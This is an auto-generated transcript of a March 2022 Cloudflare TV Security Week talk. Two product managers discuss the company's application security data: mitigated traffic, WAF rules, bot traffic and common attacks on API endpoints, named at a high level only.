🔒 Security Week Product Discussion: A Cloudflare View on Application Security

Presented by: Michael Tremante, David Belson

Originally aired on March 22, 2022 @ 9:30 AM - 10:00 AM EDT

Join Cloudflare's Product Management team to learn more about the products announced today during Security Week.

Read the blog posts:

Tune in daily for more Security Week at Cloudflare!

SecurityWeek

English

Security Week

Transcript

Good morning and welcome to Cloudflare TV. We're here this morning to talk about Cloudflare's view and application security. And we're going to build on the reports that our security team has been publishing for the last few years. I'm David Belson, and I'm excited to be joined this morning by my colleague Michael Tremante. Michael, why don't you introduce yourself? Sure. Hello, everyone. Nice to see you all again. Some of you may recognize me by some of the other sessions I've been doing this week. I'm a product manager at Cloudflare. I've been here for quite some time, but more recently I've been focusing on application security. So really excited to be with you today, David, talking about one of the recent reports we published. Excellent. Thank you. So before we start, I just want to remind everybody that you can ask questions to us by emailing live studio at Cloudflare. And we will try to answer what we can live now. And if not, we will follow you afterwards. All right, Michael. So before we jump in, I want to set the scene a little bit. Can you describe what application security is at a high level? Yeah, sure. So of course, it's a massive topic, right. If you have anything connected to the Internet that potentially is public facing all the way froma blog, a standard website, a marketing initiative or larger businesses, they may have ecommerce applications all the way to large enterprises. Those assets are now commonly used. Especially now with the pandemic, there's been an increase in online activity across the board. And unfortunately, not everyone on the Internet is a good actor. Let's say some people say, yeah, just by chance. There's a there's a lot of malicious activity out there. And when we talk about application security, we're mostly referring to all of those processes, software, tools, technologies that can help you really make sure that your app is safe. And that, of course, more importantly, that the data, your end user data, which you're likely storing on your app, doesn't get compromised and used for nefarious purposes somewhere else. And of course, a big chunk of what Cloudflare does and we've started looking at the data together is around application security. I just want to give a few examples. Of course, the big one that started all the way from the first day is Cloudflare became popular. Of course, these are details mitigation now for who doesn't know, DDoS stands for Distributed Denial of Service, and it's a bit of a blunt tool that some attackers will try to use to take down an application by overloading overloading the app itself. Sometimes this is done by pure number of requests. The view of an attacker has a way to gain control of a botnet. They may have, I don't know, 15,000 compromised Iot devices at their disposal. And they have a grudge against something or someone. They may literally brute force their way to take down that app. That's just one example. A couple of others. Of course, the loss mitigation is somewhat quite easy if you have a large network like Cloudflare does. But more sophisticated attacks will be done by hackers, potentially even manually, to try to look for explicit exploits or vulnerabilities in the app. Before I joined Cloudflare, I used to do it. I used to be a pin tester. So have I'm not I'm not good by any means, but I have a little bit of experience of recognizing what is good or bad. And that is where something like a web application firewall comes into place. So if an attacker is trying to I don't know, there's a there's a form on your website or sign up form if by any chance the development of that form wasn't done with security in mind, that form might be vulnerable to receiving, let's say, scripts or SQL code. Sql is a common programing language for backend database systems, and by adding specific payloads, the attacker may actually be able to, one, infiltrate the back end server and take control of it. Worst case scenario, or still pretty bad, it might be able to exfiltrate data directly from the form itself, in which case your user data is out there on the web. The of course, these are two examples. There's a lot more that goes into application security. And some technologies are a lot more sophisticated than just looking at payloads. To give one such example, at Cloudflare we provide a IP threat reputation database, which isn't necessarily making a decision on blocking traffic based on the payload itself, but it's based on what has given an IP address. And I know that IPs are no longer the best signal for malicious traffic, but what has been the behavior of that client across potentially the network? And if they're constantly if we're constantly observing bad behavior or very fast automated traffic, that may indicate that IP is a compromised device or similar customers may be able to use signals such as these again to protect their apps, all in the scope of application security. There's the other part. Of course, it's everything around what do security analysts can do on top of your of all of this data to make sure constantly locking down, reviewing compromises, forensics, incident analysis, the scope here is pretty large. So it's a nice, nice combination between the what we're able to automate and what we can sort of tune manually. And for the purposes of what we're talking about today, are we looking at just web traffic or are we looking at sort of all the Internet traffic that we see at Cloudflare? Yeah. So we had a look right when, when we referred to app security in the context of today and the blog post and the report we published recently, we're sort of splitting the spectrum of things we could look at to HTTP, layer seven traffic only. That's to some extent where more interesting things happen. As I said, something like a DDoS attack could be just the brute force of volume thing, but because we're a Layer seven proxy, we understand the HTTP protocol, which is the core component of how the World Wide Web portion of the Internet works. So we if we drill down into that, there's some very interesting insights. And today we're covering both whenever we refer to traffic, we're talking about HTTP and of course, HTTPS traffic passing through our network. Cool. Thank you. So given the broad portfolio of application security services that Cloudflare has, what makes us unique in this space? Yeah. And actually, this is this is what actually made us excited about publishing some of this data. Right. We as of today, you know, it took us a while to get where Cloudflare is, but we're Proxying protecting, I would say, more than 20 million applications on the Web. And we have built this network which is comprised of edge locations. And in fact, just the other day we publish a number of additional cities where we deployed our points of presence. And the cool thing here is this has given us visibility into a tremendous amount of traffic. So if we look at on average, Cloudflare is now Proxying again at layer seven, 32 million requests per second. That is a pretty big number. You know, there's large applications out there, but as numbers go, it's a pretty big number. Right. And that number gets even bigger, a peak. So there's some seasonality maybe in some customers. The typical example would be something like a Black Friday, where a lot of our eCommerce customers have massive events, marketing events, and at peak that number goes up all the way to 44 million requests per second. That overall, I'm sure that we'll have to revisit those numbers next year as they'll be even bigger. And what this gives us is visibility into identifying trends. Right. And not only regional trends, but global trends. What sort of attacks are we observing across the network and also even for our own customers benefit? A lot of this intelligence is going back into the products themselves. Right. So when we spot a new attack vector, we might update our manage rules. When the when a customer gets attacked by Adidas vector, it's not mitigated out of the box, which is not common, but happens. Our teams will update our data mitigation rules and deploy updates to everyone. And that's really, I think, where the power of the of the cloud for network now lies is in the intelligence that we gain from shared community sort of aspect of being on top of the network, which was a core fundamental when Cloudflare got founded, right. Bringing those tools that only the large expensive companies could afford down to everyone who has something to publish on the World Wide Web. Right. Democratizing the access to security capabilities. Absolutely. All right. So with the 20 million applications that we protect and the 32 to 44 million request per second that we see, you know, we looked at that and in the blog post we published yesterday, we said that about 8% of the HTTP traffic that we see is mitigated. Can you explain what mitigated traffic is? Yeah, absolutely. I think it's whenever we publish these things is important to define what we're talking about because a lot of it is about interpreting the data correctly and that 8% is equal to 2.5 something million requests per second mitigated, which is still a very large number, if you think about it in that way. But mitigated we chose, we thought quite a bit on what was the right definition here and it boils down to any HTTP requests that either by automated means from our managed security products, for example, the, the WAF, the dos, mitigations, etc. Potentially, even by our customer's own configurations, are receiving what I would call a terminating action from the edge. Things that essentially are being blocked is not is not comprehensive enough. But if a request was blocked or if it was challenged and let me go into some detail on what those things mean. But if there was an act that requested in proxy all the way to the origin, then this accounts as a mitigated request. So there's something in that request that was deemed malicious by something on our products or someone from our customer side, and therefore it builds to the account. Blocking, of course, is the default easy one to understand if a request is has a malicious payload, as I said earlier, like an injection attempt or a cross-site script request attempt and it matches a manage rule. It's very easy for WAF to be configured in in a blocking mode. That's actually the way you should configure a WAF so that request doesn't get through to your origin. The client will receive a403 response code and is enabled to proceed further right within the Cloudflare dashboard though we do have other sort of actions that definitely count as mitigated. To give you two examples, one of them is a JavaScript challenge. This is very effective at blocking bots that are not fully blown headless browsers. If I were to write a script and I want to crawl someone's website and download data and let's say that someone doesn't want me to do that, I'm issuing a JavaScript challenge to crawlers is a very easy way to really force me to increase my efforts if I want to keep crawling because the bot the kernel will not pass, the JavaScript will not execute it and will not be able to solve the challenge. And therefore all my requests will be blocked. As if I was browsing from my Chrome or my Firefox. My browser would be able to be like, okay, I can do that computation, send back the result. And then we would say, okay, great, go ahead. Yeah, exactly. And the nice thing about the JavaScript challenge and similarly related sort of mitigation events is that browsers will do this action instantly and there's negligible end user impact, right? So if you are browsing a sign, you receive a JavaScript challenge for whatever reason, chances are you will not even notice. It happens behind the scenes. Cool. Okay. So given that we're seeing these tens of millions of requests a second, how do we know that any particular request, any given request needs to be mitigated? What about a given request will raise a red flag in our system kicking off these these mitigation actions. Yeah. So it's interesting to look at the manage mitigations first. So I think that's where a lot of the value Cloudflare has, you know, comes into play in security, especially with products like our WAF. So those of you who are using the cloud for WAAF will be familiar with our manage ruleset for example. And these are very high, sophisticated rules that we have built internally on our security team. We have a security analyst team that are essentially constantly at the office deployed, constantly inspecting every single request, and they tend to be regular expressions for who knows what a regular session is. But essentially we're looking for characters or combination of characters or something that certain patterns, patterns write code snippets, but normally should not be in the request. And whenever there's a match, then that would be that would cause a block, in fact actually for our manager to set the default deployment. So if you're in the dashboard and you deploy it without customizing the configuration and several hundred of these rules are default to block out of the box because we're very confident on on what we're looking for. And recently, the Log4j vulnerability is the perfect example of that, right? So the team built the rules. We use our own data like we're doing here to define to define what the payload was. And then we deployed that on behalf of customers. And of course, the WAF is layer seven details. Mitigation is also a feature that does act at layer seven as well. A lot of it is blocked at layer three four. So it's volumetric requests that don't do HTTP, but at least seven for DDoS. We have some very sophisticated high threshold analysis, constantly ongoing and all of our edge pops. So if all of a sudden you have an e-commerce site and let's say your average request is X rate limits or request threshold is X, and that becomes 15 X in a very short period of time, like there's a burst of traffic. That would trigger our loss mitigations a layer seven. So even if the request themselves are not necessarily malicious individually, the pattern of them makes them makes them malicious. And that's another case where managed mitigation comes into play. And in that case, like, for example, it could be a DDoS attack or it could be some new sneakers just went on sale. I assume customers have the ability to sort of say, okay, in this case, we want to mitigate. In this case, maybe we want to put them in a waiting room or something. Yeah. Good, good, good, good. Good question. False positives is always a problem in security. Many vendors will say they've solved false positives. I would love to speak to them. Have they? They have, but yes, in some cases. And that's why we're always finetuning our mitigations of as ways for customers to configure our managed mitigations so that they can average the specific event they're expecting. They can sort of lift the threshold up or customize that a little more. But even more importantly, actually talking about mitigated events, customers can write their full filter of defining what they want to block or not. And that is that is something that we offer as part of the WAF, for example. And if a customer has defined a specific filter and they decide to block that traffic, that has also contributed towards our start. We mentioned earlier about mitigated events. Right. And so if customers are doing that, what are the criteria that they're using to mitigate on? What are they looking for? Yeah, a good question. We were very curious to look into that as well. We've done it a couple of times in the past and this time we spent a bit more time exploring. First of all, we have an interesting thing to give some value to this insight 6.5 million more or less actively deployed custom macros running at the edge. So it's a pretty big number. It's a pretty big dataset. The number one sort of feature or filter customers seem to be using is still IPS or IP related fields. The country the network number is an autonomous system the IP is part of or any sort of immediately deductible fields, which is interesting. I believe personally, it's it's the easy thing to do if you're under attack and something is not being mitigated by Cloudflare out of the box. The first thing people look at is what IP is causing the problem. Having said that, of course, there's a lot of growing concerns on using IP addresses are as a as a signal for malicious traffic, things like proxies, forward proxies, VPNs, even Apple's private relay that has been mentioned a couple of times are making IPS. Not a good way to block traffic. The other thing I'll add there, which was on the good side, though, IPs are very often combined with other filters. So on average, our rules have three or more filters or fields used in combination. So we're not just like an IP block. And customers tend to be using HTTP paths, request headers or other signals in their request to make sure they're blocking the right things on the right, on the right applications. We do offer as part of Cloudflare more sophisticated, intelligent fields going back to what I was saying earlier, and a non-negligible percentage of rules are making use of these fields, the two ones that top the list are definitely the bot score, which is part of our bot management product where we allow customers to identify or set their own thresholds on what is about what is not. And then the IP threat reputation score, which what I mentioned earlier, which is based on what we observe as behavior across the network and then we assign a score. Okay, this request is potentially malicious, not because itself is malicious, but because it's been doing other malicious things across the network. Right. That makes sense. So using IP addresses or IP address, derived mitigations are sort of blunt force, but using them in combination with other. Pieces of insight, other pieces of data helps you do a little more surgical surgical blocking. So we're talking about malicious traffic and mitigating malicious traffic. I've seen a lot in the press that bots are also frequently talked about when malicious traffic is being discussed. Can you give the ten second overview of what a bot is? And then if you can touch on are all bots bad or there are some kinds of good bots. How does that landscape play out? Yeah, we published some stats around this in the past and we've updated it as part of the report. First, what is the bot? If something is generated, an HP request is not coming from a human using a browser. It's loosely defined as a bot, is it? There's a vast amount of ambiguity in that definition. Of course, depending on who you ask, they'll give you slightly different answers, which is part of the problem solving. Bot management is actually quite hard. But generally speaking, if it's not a human using a browser, it's a bot. We looked at, we sort of refresh our data and at time of writing we observed that 38% of all HTTP traffic is coming from automated devices or from box, which is a substantial amount across all global traffic we observed. Absolutely right. Not all bots are bad, so only because it's about you shouldn't block it. And for this reason we've actually implemented quite a few features on top of our bot management product to let you define more easily what is good versus bad. One obvious one is our verified bots list. These are things like Google Crawler, Bing, other sort of tools out there that are doing scans for legitimate reasons. The list is verified. Bots is quite large as well over 100. And if you haven't seen this, by the way, please head over to David. I think you may have also worked on this Cloudflare Radar. We're now publishing our verified bots list, and it's not the full set just yet, but it's already including quite, quite, quite a lot of the verifiable. So you can check what is included in that list. More recently, to make this easier, we've also launched a friendly bots list which was part of Security Week. So if something is not verified but you think it's sort of good or acceptable for your environment, you can flag them as such. And then we on the background will be constantly checking, you know, what are the more popular bots that customers are flagging as acceptable? Also, the way to improve our verified bots list. The verified bots list, I believe is on the homepage at Cloudflare. So with those verified bots, those good bots like search engines and the like, those are those are the ones we wouldn't want to block traffic from. How much of the automated traffic we see is, is from bad bots and what the customer is doing, what our customers are doing about that traffic. Right. So about a little less than a third is non verified, so about 31% if I remember correctly. So these are all things that we don't recognize as a popular service that we're sort of advising to allow by default. So all of this traffic, again, doesn't necessarily mean it's all bad, but it's definitely good for anyone using the cloud about whom to review and see what's going on to make it a more thoughtful decision. And when we look at the non verified traffic, actually nearly 40% of it is blocked by our customers. I want to reiterate that's an active decision that our customers make. We're just providing the metadata to make that decision. And of course that's by blocked we're talking about mitigated events, but actually quite a good chunk of those mitigating events are actually blocked. So not JavaScript challenges or CAPTCHA challenges or similar. So it was actually quite a good confidence that most of the non verified bots, at least from our perspective, is unwanted. Very often these are crawlers, vulnerability scanners. You know, anyone can download something from the internet now and do a scan on a website looking for vulnerabilities and those things would be flagged as non verified bots. The other really quick thing I'll mention here, looking at the non verified bot traffic, we actually see a non-negligible percentage of that being blocked by our loss mitigation, which kicks in before customer mitigations, which is a good validation for us because it's telling us that a lot of these non verified bots are actually compromised devices being part of Iot botnets. So it's, it's working as expected. Poorly behave. All right. So in the last 5 minutes that we've got, I also wanted to just continue that conversation on automated traffic and talking about APIs a little bit. Api is obviously now enable a lot of the computer to computer communications that that happen with IoT and our connected devices and. Just like that. Our colleague Daniel published a blog post back in January. I remember that. So the API traffic is now over half of the requests on the Cloudflare network. What does the attack landscape look like for API traffic? Yeah. And before. Before we dive into that, it's also interesting to note. What are we defining as API traffic, literally? Yeah. Yeah, it's little easier than bots. So when we, when we're defining, you know, 50, 50 plus percent of traffic is API. Normally you recognize API traffic by looking at what the response content type is, if it's something like JSON or XML format. It's obviously not intended to be consumed by a browser by human using the browser. So we classify that as API. Now looking at mitigated traffic, it's it's it's very important to then define that a little more because if it's mitigated, we don't actually get the response from a server. So we cannot rely on the response type to define this as traffic. So what we did is we correlated the accept header from the browser. So the browser can also say I want a JSON response, I want an XML response. So we correlated that with the endpoints where we see those responses being issued. And there's was a pretty good correlation between the two. It's not 100% bulletproof, but if we look at those requests and then we look at the mitigated definition we talked about earlier, so anything like a block, a challenge or similar, we actually find that 10% of all API requests are mitigated, which is actually higher compared to our global traffic trends, which to your point, makes me think that API endpoints are becoming more of a target for attackers compared to standard web applications. Where the high value information is hiding. So for those attacks that are targeting the APIs, is there anything we see specifically in the attack patterns that like, for example, our LAF Blocks? Yeah. So this is actually something that surprised me the most. Well, for global traffic trends, for example, we look at managers HTTP anomalies tops the list as the most common attempted exploit. Things like missing HTTP headers, no bad characters. Somewhere in the request, incorrect UTF eight encode like little things that web servers may not parse properly. And by far top the list, if we look at API, traffic is more specific and actually SQL injection tops the list, which makes sense given a lot of these API calls will be relying on database queries. Right. And it really goes to show that attackers are focusing their efforts on API endpoints. Injection is just one example. The other two attack vectors that caught my eye. Command injections are lot more frequent on API endpoints and I and I think that's again really showing how attacks on API endpoints are focused. And the other one that surprised me is the serialization attacks which really come into place with some specific backend frameworks where the API request is expecting a specifically crafted object that might be converted into a an equivalent object in the back end programing environment. And if there's ways you can trick that, you can make your backend server do arbitrary things. And this is commonly attempted on API endpoints. Last thing I'll say there as well, where we're expecting our positive security model with API shield to slowly really start creeping up in terms of mitigation events as customers are adopting API shields, which will lose some visibility on what attacks they're performing because if it doesn't conform to the API, we just block it out, right. But positive models are very, very good way of locking down API endpoints. An API shield, I assume, works in conjunction with the API gateway that we announced earlier this week. So the API shield is a security portion of gateway and all of our products work really well together, which is part of the value of Cloudflare. Of course. Cool. All right. Well, thank you. With that, we'll take this opportunity to close out this first look at Cloudflare view on application security. We look forward to sharing more of those insights in the future. So thank you again, Michael, for joining me today. I don't know if you have any more Cloudflare TB security plans or is the last. One last one for clarity for security week. I'm sure I'll see the audience again in the near future. Excellent. So now you can actually go take a nap. It's fantastic and. Rest. Fantastic. All right. Well, thank you, everybody, for joining us. And we will see you again very soon.

Security Week

Security Week is one of Cloudflare's flagship Innovation Weeks, and features an array of new products and announcements related to bolstering the security of — and ultimately helping build — a better Internet. Tune in all week for deep dives on each...

Watch more episodes